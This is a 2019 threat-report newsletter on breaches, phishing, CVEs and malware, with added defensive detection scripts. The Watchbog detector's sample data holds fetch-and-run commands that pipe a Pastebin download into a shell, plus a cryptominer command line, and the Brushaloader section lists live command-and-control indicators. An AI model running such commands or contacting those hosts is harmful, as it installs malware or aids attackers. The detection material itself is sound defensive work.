Threat Report

Wednesday July 24th 2019

Let’s get this party started. Russian FSB’s secret projects exposed, a new Office 365 (O365) phishing campaign underway, universities at risk from phishing, newly disclosed vulnerabilities, and Brushaloader and Watchbog running wild. Oh, and a ProFTPD vulnerability hits the streets.

FSB contractor breached for 7.5TB

On July 13, 2019, a group of hackers calling itself 0v1ru$ breached SyTech, a contractor for the FSB, Russia’s national intelligence service. The group got into SyTech’s Active Directory server and from there reached the company’s entire network, including a JIRA instance.

Hackers stole 7.5TB of data from the contractor’s network and defaced the company’s website.

Hackers also posted screenshots of the company’s database on Twitter and shared the data with Digital Revolution, another hacking group.

The second group shared the stolen data on their Twitter account on July 18, 2019.

FSB’s (formerly) secret projects include:

  • Nautilus – a project for collecting data about social media users
  • Nautilus-S – a project for deanonymizing Tor traffic with the help of rogue Tor servers
  • Reward – a project to covertly penetrate P2P networks
  • Mentor – a project to monitor and search email communications on the servers of Russian companies
  • Hope – a project to investigate the topology of the Russian internet and how it connects to other countries’ networks
  • Tax-3 – a project for the creation of a closed intranet to store the information of highly-sensitive state figures, judges, and local administration officials, separate from the rest of the state’s IT networks

BBC Russia, which received the trove of data, says there were also older projects for researching other network protocols such as Jabber, ED2K, and OpenFT. SyTech took down its website and has refused to respond to media inquiries.

Phishing for O365 admins

An ongoing phishing campaign has been spotted in the wild that targets Office 365 admins. The emails spoof Office 365 admin alerts about sensitive issues that supposedly require an admin’s immediate action, which is enough to trick potential victims into clicking.

Clicking the fake, malicious alert takes victims to a phishing landing page that prompts them to enter their Microsoft login credentials. The page is hosted on Azure and served with a certificate from Microsoft, which makes it look legitimate.

A successful compromise lets attackers create new accounts under the organization’s domain, send mail as other users, and read other users’ emails.

Users should always be cautious with email content that claims to come from a legitimate company or vendor. Organizations should also monitor their Office 365 logs for new account creation and for logins from unfamiliar source addresses.
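The two log signals recommended above can be checked together: a successful sign-in from an address the admin has never used, followed by an account creation from that same address, is the trail a successful admin phish leaves. The script below is an added example, not code from the original report or from Microsoft. Its records are constructed, and the field names (CreationTime, Operation, UserId, ClientIP, ResultStatus, ObjectId) and the operation names "UserLoggedIn" and "Add user." are assumed to follow the Unified Audit Log export schema; check them against a real export before relying on this.

```python
"""Triage exported Office 365 Unified Audit Log records for new account
creation and successful sign-ins from source addresses a user has not been
seen from before, then correlate the two.

Added example; records are constructed and field/operation names are assumed.
"""
import ipaddress
import json
from collections import defaultdict

# Constructed sample export, one JSON record per line (not real tenant data).
SAMPLE_LOG = """
{"CreationTime": "2019-07-22T08:01:10", "Operation": "UserLoggedIn", "UserId": "admin@example.org", "ClientIP": "203.0.113.10", "ResultStatus": "Success"}
{"CreationTime": "2019-07-22T08:15:42", "Operation": "UserLoggedIn", "UserId": "admin@example.org", "ClientIP": "203.0.113.10", "ResultStatus": "Success"}
{"CreationTime": "2019-07-23T02:44:09", "Operation": "UserLoggedIn", "UserId": "admin@example.org", "ClientIP": "198.51.100.77", "ResultStatus": "Success"}
{"CreationTime": "2019-07-23T02:46:30", "Operation": "Add user.", "UserId": "admin@example.org", "ClientIP": "198.51.100.77", "ResultStatus": "Success", "ObjectId": "helpdesk2@example.org"}
{"CreationTime": "2019-07-23T02:47:01", "Operation": "UserLoggedIn", "UserId": "jane@example.org", "ClientIP": "203.0.113.22", "ResultStatus": "Failed"}
"""

# Networks the tenant's admins normally sign in from (constructed; use your own egress ranges).
TRUSTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]


def parse_records(text):
    """Parse a line-delimited JSON export into a list of dicts, oldest first."""
    records = [json.loads(line) for line in text.strip().splitlines() if line.strip()]
    return sorted(records, key=lambda r: r["CreationTime"])


def is_trusted(ip):
    """True if the address falls inside one of the known-good networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # empty or malformed ClientIP field
        return False
    return any(addr in net for net in TRUSTED_NETS)


def triage(records):
    """Return (account_creations, suspicious_logins).

    A successful login is suspicious when it comes from an address outside
    TRUSTED_NETS that this user has not used earlier in the export; the
    per-user baseline is built from the export itself as it is read.
    """
    seen_ips = defaultdict(set)
    creations, suspicious = [], []
    for rec in records:
        op, user, ip = rec.get("Operation", ""), rec.get("UserId", ""), rec.get("ClientIP", "")
        if op == "Add user.":
            creations.append((rec["CreationTime"], user, rec.get("ObjectId", "?"), ip))
        elif op == "UserLoggedIn" and rec.get("ResultStatus") == "Success":
            if ip not in seen_ips[user] and not is_trusted(ip):
                suspicious.append((rec["CreationTime"], user, ip))
            seen_ips[user].add(ip)
    return creations, suspicious


def correlate(creations, suspicious):
    """Account creations performed by a user from the same address as one of
    their suspicious logins: the sequence a successful admin phish produces."""
    flagged_pairs = {(user, ip) for _, user, ip in suspicious}
    return [c for c in creations if (c[1], c[3]) in flagged_pairs]


if __name__ == "__main__":
    creations, suspicious = triage(parse_records(SAMPLE_LOG))
    for item in suspicious:
        print("suspicious login:", item)
    for item in correlate(creations, suspicious):
        print("account created from suspicious session:", item)
```

On the constructed export this flags the sign-in from 198.51.100.77 and ties the creation of helpdesk2@example.org to it; the earlier sign-ins from the trusted range are not reported. Building the baseline from a longer export, or from a stored history, reduces noise from admins who legitimately roam.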

Universities under siege

Hackers gained access to Lancaster University databases and stole personal data of prospective and current students. Names, addresses, telephone numbers, and email addresses were compromised through access to undergraduate application records for 2019 and 2020.

The university has over 13K students, but no exact number of affected people has been given. The student records system was also breached, giving access to the ID documents of what the university described as a small number of students.

Undergraduate applicants were then targeted with phishing emails carrying fraudulent invoices, and the university warned potential victims to be on guard. Lancaster became aware of the breach on July 19, 2019 and set up an incident response team to investigate. The university said it is focused on safeguarding its IT systems and is busy identifying and advising those who have been affected.

In related university security news, exploitation of an Ellucian Banner Web Tailor vulnerability, tracked as CVE-2019-8978, has been spotted in the wild and has impacted the systems of 62 colleges and universities.

The vulnerability affects Ellucian Banner Web Tailor versions 8.8.3, 8.8.4, and 8.9 and Banner Enterprise Identity Services versions 8.3, 8.3.1, 8.3.2, and 8.4. CVE-2019-8978 allows remote attackers to steal a victim’s session and to cause a denial of service.

The U.S. Department of Education issued an alert after gathering information on exploitation attempts against 62 universities. Victims reported that after breaking into their systems, attackers used scripts in the admissions or enrollment section of the affected Banner system to create multiple student accounts.

It also reported that at least 600 fraudulent student accounts were created within a 24-hour period and used for criminal activity. Since the Ellucian Banner Web Tailor system is connected to the rest of the ERP, which is used by over 1,400 colleges, universities, and other institutions, attackers might gain access to students’ financial aid data.

Organizations’ best defense is to keep the software up to date with timely patches. No indicators of compromise were released with this report.
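With no indicators published, the detectable artifact of this activity is the pattern itself: hundreds of self-service account creations in a day, often clustered behind few source addresses. The following added example (not code from the report or from Ellucian) slides a time window over account-creation events and ranks the sources behind them. The CSV shape (timestamp,source_ip,account) is an assumed export from the admissions application’s logs, and the events are constructed.

```python
"""Spot bursts of self-service account creation by sliding a time window over
creation events, overall and per source address.

Added example; event format is assumed and events are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed events: a normal trickle of applicants, then six accounts from
# one address in under a minute.
SAMPLE_EVENTS = """
2019-07-20T09:12:03,203.0.113.5,applicant001
2019-07-20T14:30:45,203.0.113.9,applicant002
2019-07-21T01:00:00,198.51.100.8,applicant003
2019-07-21T01:00:07,198.51.100.8,applicant004
2019-07-21T01:00:15,198.51.100.8,applicant005
2019-07-21T01:00:21,198.51.100.8,applicant006
2019-07-21T01:00:29,198.51.100.8,applicant007
2019-07-21T01:00:36,198.51.100.8,applicant008
2019-07-22T11:45:10,203.0.113.14,applicant009
"""


def parse_events(text):
    """Return (timestamp, source_ip, account) tuples sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ts, ip, account = line.split(",")
        events.append((datetime.fromisoformat(ts), ip, account))
    return sorted(events)


def sliding_peak(timestamps, window):
    """Largest number of timestamps that fall inside any half-open window
    [t, t + window). `timestamps` must be sorted ascending."""
    recent = deque()
    peak = 0
    for ts in timestamps:
        recent.append(ts)
        while ts - recent[0] >= window:
            recent.popleft()
        peak = max(peak, len(recent))
    return peak


def detect_bursts(events, window_seconds=86400, per_source_threshold=5):
    """Return (overall_peak, flagged): the peak creation count in any window of
    `window_seconds`, and a map of each source IP whose own peak reaches
    `per_source_threshold` to that peak."""
    window = timedelta(seconds=window_seconds)
    overall = sliding_peak([ts for ts, _, _ in events], window)
    by_source = defaultdict(list)
    for ts, ip, _ in events:
        by_source[ip].append(ts)
    flagged = {}
    for ip, stamps in by_source.items():
        count = sliding_peak(stamps, window)
        if count >= per_source_threshold:
            flagged[ip] = count
    return overall, flagged


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    print("24h window:", detect_bursts(events))
    print("60s window:", detect_bursts(events, window_seconds=60))
```

Two windows are worth running side by side: a day-long one catches the slow volume described in the alert, while a minute-long one catches scripted creation that would be lost in a busy enrolment day’s legitimate total. Thresholds should be set from the institution’s own baseline of daily sign-ups.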

Jira and Exim servers’ exploits lead to Watchbog Trojan variant

Hackers are exploiting vulnerable Jira and Exim servers to infect them with a new variant of the Watchbog Linux Trojan and use the resulting botnet as part of a Monero cryptomining operation. The new variant was spotted on VirusTotal by Intezer Labs’ polarply. Its payload exploits the 12-day-old Jira template injection vulnerability, CVE-2019-11581, and also abuses the Exim remote command execution flaw tracked as CVE-2019-10149. A Shodan search showed over 1,610,000 unpatched Exim servers that could be affected by this attack, and BinaryEdge counts over 54K vulnerable Atlassian JIRA servers.

This variant is dangerous because, when it was seen on VirusTotal, no scanning engine detected it. After exploiting a vulnerable target, Watchbog drops a Monero coinminer. It also downloads and executes commands from Pastebin that deploy and launch the final cryptocurrency miner payload, and it establishes persistence on the compromised system so that it can reinfect it. Based on the coinmining config, the variant uses the minexmr.com mining pool. The malicious script also leaves a contact note for its victims on the compromised Linux servers.
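Two of the behaviours above are easy to hunt for on a Linux host: commands fetched from Pastebin and piped into a shell, and a miner configured for the minexmr.com pool. The script below applies the same rules to process command lines and to scheduled-task entries. It is an added example, not code from the report or from Intezer; the process list and crontab lines are constructed, the paste IDs and wallet are placeholders, and checking cron for the persistence step is this example’s assumption (the report does not name the persistence mechanism).

```python
"""Scan process command lines and crontab entries for the Watchbog behaviours
described in the report: Pastebin fetches piped to a shell and the minexmr.com pool.

Added example; sample data is constructed and cron-as-persistence is assumed.
"""
import re

# Constructed `ps -eo user,pid,args` style output (not from a real host).
SAMPLE_PROCESSES = [
    "root      1423 /usr/sbin/sshd -D",
    "jira      2210 /usr/bin/java -jar /opt/atlassian/jira/jira.jar",
    "jira      2731 /bin/sh -c curl -fsSL https://pastebin.com/raw/PLACEHOLDER1 | bash",
    "jira      2790 /tmp/miner -o pool.minexmr.com:4444 -u WALLET_PLACEHOLDER",
]

# Constructed crontab entries.
SAMPLE_CRON = [
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/10 * * * * curl -s https://pastebin.com/raw/PLACEHOLDER2 | sh",
]

# (rule name, compiled pattern, weight). Weights let a fetch-and-pipe line
# outrank a lone pipe into sh, which has legitimate uses.
RULES = [
    ("pastebin_raw_fetch", re.compile(r"pastebin\.com/raw/\S+", re.I), 2),
    ("pipe_to_shell", re.compile(r"\|\s*(?:ba)?sh\b"), 1),
    ("minexmr_pool", re.compile(r"minexmr\.com", re.I), 3),
]


def scan(lines, source):
    """Return one finding per matched rule: (source, line_no, rule, matched_text)."""
    findings = []
    for no, line in enumerate(lines, 1):
        for name, pattern, _ in RULES:
            m = pattern.search(line)
            if m:
                findings.append((source, no, name, m.group(0)))
    return findings


def score_lines(findings):
    """Sum rule weights per (source, line_no) so analysts can sort by severity."""
    weights = {name: w for name, _, w in RULES}
    scores = {}
    for source, no, name, _ in findings:
        scores[(source, no)] = scores.get((source, no), 0) + weights[name]
    return scores


if __name__ == "__main__":
    findings = scan(SAMPLE_PROCESSES, "ps") + scan(SAMPLE_CRON, "cron")
    for key, score in sorted(score_lines(findings).items(), key=lambda kv: -kv[1]):
        print(f"{key[0]} line {key[1]}: score {score}")
    for f in findings:
        print("  ", f)
```

On a real host, feed it the output of `ps -eo user,pid,args` and the contents of the system and per-user crontabs; any hit on the pool domain, or a Pastebin fetch piped to a shell, warrants pulling the Pastebin URL content for analysis and checking the Jira and Exim patch level.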

Brushaloader profiles infected machines before loading payloads

First observed in June 2018, Brushaloader is a growing family of downloaders that actors use to profile infected machines and then load more advanced payloads. This lets actors stay under the radar better than highly disruptive techniques such as ransomware or massive malicious spam campaigns.

Immediately upon execution, Brushaloader receives a PowerShell script called “PowerEnum.” PowerEnum fingerprints the infected device and sends the data back to the C2 server over a raw TCP channel that runs in parallel to Brushaloader’s own. PowerEnum is integral to Brushaloader and shares the same C2 infrastructure.

Researchers note that, based on insights gathered from observing the command and control panel, the loader exhibits high infection success rates. The following indicators of compromise were released with the researchers’ findings.

IOC

210.16.101.169
185.203.117.63

Hashes

d994f65735bb53dda95f7ab097e59bbd2043f8091d246bc4e21ba55ba6bda764
eb12ece1bb8ebaf888282db3c6c852f3e21397d60b45a694c424690b2d6fe838
bf70c2a22bfb0cc952b29689394e623b632f1c3371f2a6864fd26514639393aa
04869bef3007a33e8bf9b14bd650e2b872daa6d2bb2b5ea35d4cb271f35d49e2
a1a6886f86ac1080d2fc3d645a8a1223209bfb1e91918d90a99b06d559ccb010
a3f00f3b77faed13f24c8d572fe59ac38a2467449a60a1b9dc1c64baeb145b0a

Domains

Fees.tetofevent[.]online
Analiticap[.]info
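The indicators above are published defanged and of mixed kinds, so the first step is to re-fang and classify them before sweeping logs. The following added example (not code from the report or the researchers) loads the list exactly as printed above, classifies each entry as IPv4, SHA-256 or domain by shape, and matches them against proxy, firewall and endpoint log lines; the log lines are constructed, only the indicators come from the report.

```python
"""Re-fang, classify and match the Brushaloader indicators against log lines.

Added example; the indicators are the report's, the log lines are constructed.
"""
import re

# Indicators as published above (defanged with "[.]").
IOC_TEXT = """
210.16.101.169
185.203.117.63
d994f65735bb53dda95f7ab097e59bbd2043f8091d246bc4e21ba55ba6bda764
eb12ece1bb8ebaf888282db3c6c852f3e21397d60b45a694c424690b2d6fe838
bf70c2a22bfb0cc952b29689394e623b632f1c3371f2a6864fd26514639393aa
04869bef3007a33e8bf9b14bd650e2b872daa6d2bb2b5ea35d4cb271f35d49e2
a1a6886f86ac1080d2fc3d645a8a1223209bfb1e91918d90a99b06d559ccb010
a3f00f3b77faed13f24c8d572fe59ac38a2467449a60a1b9dc1c64baeb145b0a
Fees.tetofevent[.]online
Analiticap[.]info
"""

# Constructed log lines from three sources (not real telemetry).
SAMPLE_LOGS = [
    "2019-07-23T10:02:11 proxy allow 10.0.0.15 GET http://fees.tetofevent.online/index.php 200",
    "2019-07-23T10:02:14 fw deny 10.0.0.15 -> 185.203.117.63:443 tcp",
    "2019-07-23T10:05:40 edr file_write C:\\Temp\\sample.bin sha256=BF70C2A22BFB0CC952B29689394E623B632F1C3371F2A6864FD26514639393AA",
    "2019-07-23T10:06:02 proxy allow 10.0.0.22 GET http://www.example.com/ 200",
    "2019-07-23T10:07:55 proxy allow 10.0.0.22 GET http://cdn.analiticap.info/a.js 200",
]

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
TOKEN_RE = re.compile(r"[a-z0-9][a-z0-9.\-]*")  # host-, hash- and IP-shaped tokens


def refang(value):
    """Undo common defanging and normalise case."""
    return value.replace("[.]", ".").replace("(.)", ".").lower()


def load_iocs(text):
    """Return {"ip": set, "sha256": set, "domain": set} from a defanged list."""
    iocs = {"ip": set(), "sha256": set(), "domain": set()}
    for raw in text.split():
        value = refang(raw)
        if IPV4_RE.match(value):
            iocs["ip"].add(value)
        elif SHA256_RE.match(value):
            iocs["sha256"].add(value)
        else:
            iocs["domain"].add(value)
    return iocs


def match_line(line, iocs):
    """Return (kind, indicator) for the first indicator found in the line, or None.
    Domains match exactly or as a parent of the observed host (cdn.x.y hits x.y)."""
    for token in TOKEN_RE.findall(line.lower()):
        token = token.rstrip(".")
        if token in iocs["ip"]:
            return ("ip", token)
        if token in iocs["sha256"]:
            return ("sha256", token)
        for domain in iocs["domain"]:
            if token == domain or token.endswith("." + domain):
                return ("domain", domain)
    return None


def scan_logs(lines, iocs):
    """Return [(line_no, kind, indicator, line)] for every line that hits."""
    hits = []
    for no, line in enumerate(lines, 1):
        found = match_line(line, iocs)
        if found:
            hits.append((no, found[0], found[1], line))
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS, load_iocs(IOC_TEXT)):
        print(hit[:3])
```

Lower-casing both sides matters: the hashes are published in lower case while endpoint agents often report them upper-cased, and the domains above are printed with capital letters that no resolver will preserve.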

ProFTPD suffers from code execution bug

ProFTPD servers are vulnerable to a remote code execution and information disclosure bug, tracked as CVE-2019-12815, that can be triggered through an arbitrary file copy vulnerability. CVE-2019-12815 is an arbitrary file copy vulnerability in “mod_copy” in ProFTPD up to 1.3.5b that allows remote code execution and information disclosure without authentication. It is related to CVE-2015-3306, a 2015 bug that let remote attackers read and write arbitrary files using the “SITE CPFR” and “SITE CPTO” commands. More than one million servers are vulnerable. Such a large pool of vulnerable servers invites abuse by attackers using future exploits to compromise all unpatched servers and infect them with malware. Users are advised to update to ProFTPD version 1.3.6 to address this vulnerability.
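Finding the servers that still need the update starts with the version each one advertises. The added example below (not code from the report or the ProFTPD project) reads ProFTPD banners collected during an inventory and compares them with the 1.3.6 target above, taking ProFTPD’s version scheme into account: a trailing letter (1.3.5b) is a maintenance release above the plain version, while an “rc” suffix (1.3.6rc4) is a pre-release below it. The banners are constructed. A banner is only a hint: ProFTPD’s ServerIdent directive can hide or alter it, so a clean banner never proves a server is patched, and the check cannot tell whether mod_copy is loaded at all.

```python
"""Compare advertised ProFTPD versions with the 1.3.6 update target.

Added example; banners are constructed and the result is a hint, not proof.
"""
import re

FIXED_VERSION = "1.3.6"  # version the report advises updating to

# "rc" is tried before the single-letter suffix so 1.3.6rc4 is not read as 1.3.6 + "r".
BANNER_RE = re.compile(r"ProFTPD\s+(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?", re.I)

# Constructed banners keyed by host (not real hosts).
SAMPLE_BANNERS = {
    "203.0.113.7": "220 ProFTPD 1.3.5b Server (ProFTPD Default Installation) [203.0.113.7]",
    "203.0.113.8": "220 ProFTPD 1.3.6 Server (Debian) [::ffff:203.0.113.8]",
    "203.0.113.9": "220 ProFTPD 1.3.6rc4 Server (Staging) [203.0.113.9]",
    "203.0.113.10": "220 ProFTPD 1.3.4a Server (Legacy) [203.0.113.10]",
    "203.0.113.11": "220 FTP Server ready.",  # ServerIdent off, or not ProFTPD
}


def version_key(text):
    """Sortable key for a ProFTPD version string or banner, or None if absent.
    Shape: (major, minor, patch, is_release, rc_number_or_letter_rank), so that
    1.3.6rc4 < 1.3.6 < 1.3.6a."""
    m = BANNER_RE.search(text)
    if not m:
        return None
    major, minor, patch, rc, letter = m.groups()
    if rc is not None:
        return (int(major), int(minor), int(patch), 0, int(rc))
    letter_rank = ord(letter.lower()) - ord("a") + 1 if letter else 0
    return (int(major), int(minor), int(patch), 1, letter_rank)


def needs_update(banner, fixed=FIXED_VERSION):
    """True if the banner advertises a version below `fixed`, False if at or
    above it, None if no ProFTPD version can be read from the banner."""
    key = version_key(banner)
    if key is None:
        return None
    return key < version_key("ProFTPD " + fixed)


def report(banners):
    """Return {host: status} with statuses 'update', 'ok' or 'unknown'."""
    labels = {True: "update", False: "ok", None: "unknown"}
    return {host: labels[needs_update(banner)] for host, banner in banners.items()}


if __name__ == "__main__":
    for host, status in report(SAMPLE_BANNERS).items():
        print(f"{host}: {status}")
```

Hosts reported as "unknown" need a configuration check rather than being dropped from the list; an administrator who has turned the banner off may well be one who patches, but the banner alone cannot say so.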

Paul Scott
